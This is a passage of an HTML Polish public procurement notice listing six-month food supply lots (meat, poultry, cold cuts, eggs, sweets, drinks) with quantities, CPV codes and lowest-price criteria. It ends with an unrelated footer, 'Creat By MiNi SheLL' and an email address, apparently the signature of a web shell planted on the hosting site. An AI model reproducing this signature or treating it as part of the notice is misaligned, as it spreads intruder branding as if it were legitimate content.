(masa netto bez zalewy)	1000-4000g	kg	35		
Sałatka - krajanka z filetów śledziowych w oleju z różnymi dodatkami 
(masa netto bez zalewy)	100-900g	kg	5		
Koreczki śledziowe z różnymi dodatkami
(masa netto bez zalewy)	1000-4000g	kg	20		
Koreczki śledziowe z różnymi dodatkami 
(masa netto bez zalewy)	100-900g	kg	5		
Klopsy rybne opiekane w zalewie 
(masa netto bez zalewy)	1000-4000g	kg	25		
Klopsy rybne opiekane w zalewie 
(masa netto bez zalewy)	100-900g	kg	7		
Pasty rybne(z makreli, tuńczyka, łososia itp.) 	1000-4000g	kg	30		
Pasty rybne(z makreli, tuńczyka, łososia itp.) 	50-500g	kg	10		
Płaty śledziowe marynowane (masa netto bez zalewy)	1000-4000g	kg	50		
Płaty śledziowe marynowane (masa netto bez zalewy)	100-900g	kg	5		
Makrela wędzona ,tusza		kg	200		
Szproty wędzone		kg	15		
Paprykarz#	100-400g	kg	50		
Szproty w oleju 	150-200g	kg	50		
Tuńczyk w oleju - kawałki	150-200g	kg	30		
Śledzie w oleju o zaw.min.60% mięsa rybnego 	150-200g	kg	22		
Śledzie w pomidorach o zaw. min. 60% mięsa rybnego.	150-200g	kg	22		
Karp świeży cały	1500-2000g	kg	45		
Ryba w galarecie	150-200g	kg	18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6, 15.23.40.00-7, 15.21.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> DOSTAWA MIĘSA WIEPRZOWEGO I WOŁOWEGO ORAZ PODROBÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek wieprzowy bez kości -świeży	kg	5
Flaki wołowe parzone, cięte 	kg	50
Karczek wieprzowy bez kości - świeży	kg	40
Łopatka wieprzowa bez kości - świeża	kg	850
Mięso mielone wieprzowo-wołowe - świeże	kg	20
Nóżki wieprzowe - świeże	kg	55
Ozory wieprzowe - świeże	kg	80
Płuca wieprzowe - świeże	kg	45
Schab wieprzowy bez kości - świeży	kg	240
Słonina mielona - świeża	kg	35
Wołowe ekstra bez kości - świeże	kg	25
Wołowe z kością, antrykot - świeże	kg	155
Żeberka wieprzowe, paski - świeże	kg	85.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> DOSTAWA MIĘSA I PODROBÓW DROBIOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczaki świeże	1300 -1700g	kg	120
Porcje rosołowe mrożone -paczkowane	500g -2000g	kg	350
Serca z indyka świeże 		kg	35
Udka z kurczaka, ćwiartki - świeże	350-400g	kg	65
Wątróbka z kurczaka -świeża 		kg	80
Żołądki z indyka - świeże 		kg	50
Filety z kurczaka - świeże		kg	120
Filety z indyka - świeże		kg	25
Podudzie z kurczaka - świeże	150g-180g	kg	320
Filet z udźca z kurczaka, bez skóry - świeży	100-160g	kg	130
Filet z udźca z kurczaka, ze skórą - świeży	120 - 180g	kg	155
Udziec z kurczaka z kością - świeży	150-180g	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> DOSTAWA WĘDLIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron wieprzowy gotowany (zawartość mięsa wieprzowego min. 80% )		kg	65		
Blok drobiowy grubo rozdrobniony (zawartość mięsa drobiowego min. 70% )		kg	95		
Blok wieprzowy grubo rozdrobniony (zawartość mięsa wieprzowego min. 70%)		kg	130		
Boczek rolowany faszerowany (zawartość mięsa min. 70%)		kg	70		
Boczek wędzony surowy, paski bez kości, 		kg	180		
Filet  z indyka wędzony, pieczony-płat (mięso z indyka nierozdrobnione min.95%)		kg	50		
Kiełbasa wieprzowa biała  parzona średnio rozdrobniona (zawartość mięsa min.75%)		kg	100		
Kiełbasa wieprzowa podsuszana grubo rozdrobniona - kanapkowa, np. żywiecka, krakowska, oławska itp.(zawartość mięsa min.80%)		kg	110		
Kiełbasa wieprzowa parówkowa drobno rozdrobniona (zawartość mięsa min.70%)		kg	230		
Kiełbasa wieprzowa surowa wędzona średnio rozdrobniona (zawartość mięsa min.80% )		kg	40		
Kiełbasa wieprzowa swojska wędzona, pieczona cienka, średnio rozdrobniona    (zawartość mięsa min.80% )		kg	160		
Kiełbasa wieprzowa parzona                  grubo rozdrobniona - kanapkowa, np. krakowska, kminkowa, dębicka itp.(zawartość mięsa min.80%)		kg	125		
Kiełbasa wieprzowa szynkowa grubo rozdrobniona (zawartość mięsa min.80%)		kg	90		
Kiełbasa śląska drobiowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	140		
Kiełbasa śląska wieprzowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	120		
Kiełbasa toruńska średnio rozdrobniona (zawartość mięsa min.70%)		kg	85		
Kiełbasa wieprzowa głogowska średnio rozdrobniona (zawartość mięsa min.80%)		kg	50		
Kiełbasa zwyczajna średnio rozdrobniona (zawartość mięsa min.60%)		kg	120		
Kiełbaski wieprzowe z serem średnio rozdrobnione, cienkie( zawartość mięsa min.70% )		kg	20		

Krupnioki śląskie		kg	65		
Bułczanka		kg	45		
Metka wieprzowa podwędzana                        grubo rozdrobniona		kg	70		
Metka smakowa  średnio rozdrobniona, np. cebulowa, tatarska, łososiowa itp.		kg	60		
Mielonka drobiowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	40		
Mielonka wieprzowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	65		
Mortadela wieprzowa drobno rozdrobniona (zawartość mięsa min. 70%)		kg	130		
Ogonówka parzona  (zawartość mięsa min. 80%)		kg	135		
Parówki  drobiowe drobno rozdrobnione (zawartość mięsa min. 70%)		kg	300		
Parówki wieprzowe śląskie średnio rozdrobnione (zawartość mięsa min. 70%)
		kg	230		
Pasztetowa drobiowa		kg	20		
Pasztetowa wieprzowa popularna		kg	50		
Pasztetowa wieprzowa podwędzana		kg	50		
Polędwica sopocka (zawartość mięsa min.80%)		kg	80		
Polędwica z indyka średnio rozdrobniona (zawartość mięsa min.70%)		kg	45		
Rolada drobiowa faszerowana (zawartość mięsa min. 70%)		kg	120		
Salami wieprzowe, szlachetne drobno rozdrobnione (zawartość mięsa min. 80%)		kg	15		
Salceson drobiowy grubo rozdrobniony (zawartość mięsa min. 40%)		kg	70		
Salceson ozorkowy grubo rozdrobniony (zawartość podrobów wieprzowych min. 51%, w tym ozory 35% )		kg	70		
Szynka drobiowa z kurczaka grubo rozdrobniona (zawartość mięsa min.70% )		kg	70		
Szynka wieprzowa gotowana (zawartość mięsa min. 80%)		kg	60		
Szynka wieprzowa parzona konserwowa (zawartość mięsa min. 75%)		kg	85		
Indyk w galarecie (zawartość mięsa min. 50%)		kg	70		
Szynka wieprzowa tradycyjna, np. wiejska, swojska, itp. (zawartość mięsa min. 85%)		kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> DOSTAWA JAJ KURZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze 	63g-73g (L)	szt.	17000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> DOSTAWA CZEKOLAD I WYROBÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Biszkopty	100-500g	kg	10		
Biszkopty 	1000-3000g	kg	50		
Bombonierka - czekoladki nadziewane 	100-200g	kg	12		
Cukierki czekoladowe (nadzienie kakaowe, orzechowe, rumowe, np. michałki, itp.)		kg	10		
Ciastka maślane 	800-2500g	kg	15		
Ciastka deserowe (kakaowe, z cukrem, z kokosem itp.)	800-2500g	kg	30		
Ciastka deserowe oblewane czekoladą	800-2500g	kg	10		
Ciasteczka deserowe 
z nadzieniem owocowym, kremowym	800-2500g	kg	10		
Pierniki nadziewane
w czekoladzie	800-2500g	kg	12		
Biszkopty z galaretką 
w czekoladzie	800-1000g	kg	12		
Galaretka w czekoladzie		kg	10		
Praliny nadziewane 
(min. 40% masy kakaowej)		kg	6		
Czekolada mleczna 
(min.30% masy kakaowej)	100g	szt.	60		
Ciastka bez dodatku cukru 	70g-150g	kg	17		
Wafelki bez dodatku cukru	70-150g	kg	4		
Mieszanka czekoladowa-opakowanie świąteczne	200-300g	kg	45		
Wafelki z kremem kakaowym (min.32%) w czekoladzie deserowej (min.47%)	200-250g	kg	35		
Pierniczki w czekoladzie (min. 15%) z nadzieniem owocowym (min.29%)	150-200g	kg	60		
Biszkopty z galaretką w czekoladzie (min. 15% czekolady)	120-150	kg	22		
Czekolada mleczna nadziewana - świąteczna (min. 30% masy kakaowej)	100g	szt.	150		
Czekolada mleczna, deserowa bez dodatku cukru	100g	szt.	70		
Mikołaj świąteczny 
z czekolady mlecznej (min. 30% masy kakaowej)	60-100g	kg	18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> DOSTAWA NAPOJÓW BEZALKOHOLOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napoje owocowe pasteryzowane
niegazowane 
( min. 25% soku )	1000 -2000ml	l	300
Soczki owocowo-warzywne 100%, przecierowe 	250-330ml	l	220
Soki owocowo - warzywne 100%, przecierowe 	750-1000ml	l	300
Sok wysoko słodzony -naturalny zagęszczony	330-500ml	l	30
Woda mineralna gazowana /niegazowana	1500 ml	szt.	6
Piwo ciemne bezalkoholowe	400 - 500 ml	l	4
Soki owocowe 100%	1000ml	l	35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com